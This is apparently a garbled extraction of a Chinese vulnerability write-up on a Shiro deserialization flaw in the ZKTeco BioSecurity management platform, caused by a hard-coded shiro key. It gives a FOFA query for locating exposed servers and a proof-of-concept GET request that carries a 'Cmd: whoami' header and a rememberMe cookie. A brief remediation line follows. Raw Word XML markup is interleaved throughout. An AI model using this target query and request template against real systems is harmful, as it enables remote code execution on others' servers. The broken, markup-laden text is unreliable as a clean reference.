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Zkteco百傲瑞达安防管理系统平台 Shiro反序列化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Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。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app="ZKTECO-百傲瑞达安防管理系统平台" &amp;&amp; title!="TimeTec Cloud AWDMS"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1427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GET / HTTP/1.1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Host: your-ip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Cmd: whoami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Cookie: rememberMe=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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Accept-Encoding: gzip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5420" cy="2034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1、1. 更新Apache Shiro版本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1442EDC"/>
    <w:rsid w:val="088766C0"/>
    <w:rsid w:val="09684FD8"/>
    <w:rsid w:val="0B8E420A"/>
    <w:rsid w:val="0CFE5DA6"/>
    <w:rsid w:val="0F9F7790"/>
    <w:rsid w:val="156F2530"/>
    <w:rsid w:val="16247C45"/>
    <w:rsid w:val="16A064FF"/>
    <w:rsid w:val="175A0C63"/>
    <w:rsid w:val="1A862C7C"/>
    <w:rsid w:val="1D951428"/>
    <w:rsid w:val="1E6E300D"/>
    <w:rsid w:val="212D1351"/>
    <w:rsid w:val="25145328"/>
    <w:rsid w:val="2B7803BF"/>
    <w:rsid w:val="40905D53"/>
    <w:rsid w:val="43CE2E1A"/>
    <w:rsid w:val="4813210A"/>
    <w:rsid w:val="48952158"/>
    <w:rsid w:val="4B3A317F"/>
    <w:rsid w:val="4EA62829"/>
    <w:rsid w:val="501C6CBB"/>
    <w:rsid w:val="51B95737"/>
    <w:rsid w:val="5294532B"/>
    <w:rsid w:val="56010E2D"/>
    <w:rsid w:val="570F757A"/>
    <w:rsid w:val="58B640E9"/>
    <w:rsid w:val="5F13397F"/>
    <w:rsid w:val="631F28F3"/>
    <w:rsid w:val="66870E91"/>
    <w:rsid w:val="69877444"/>
    <w:rsid w:val="7074398C"/>
    <w:rsid w:val="70DB63F3"/>
    <w:rsid w:val="72447BF5"/>
    <w:rsid w:val="72CB65F3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2023-12-11T16:27:35Z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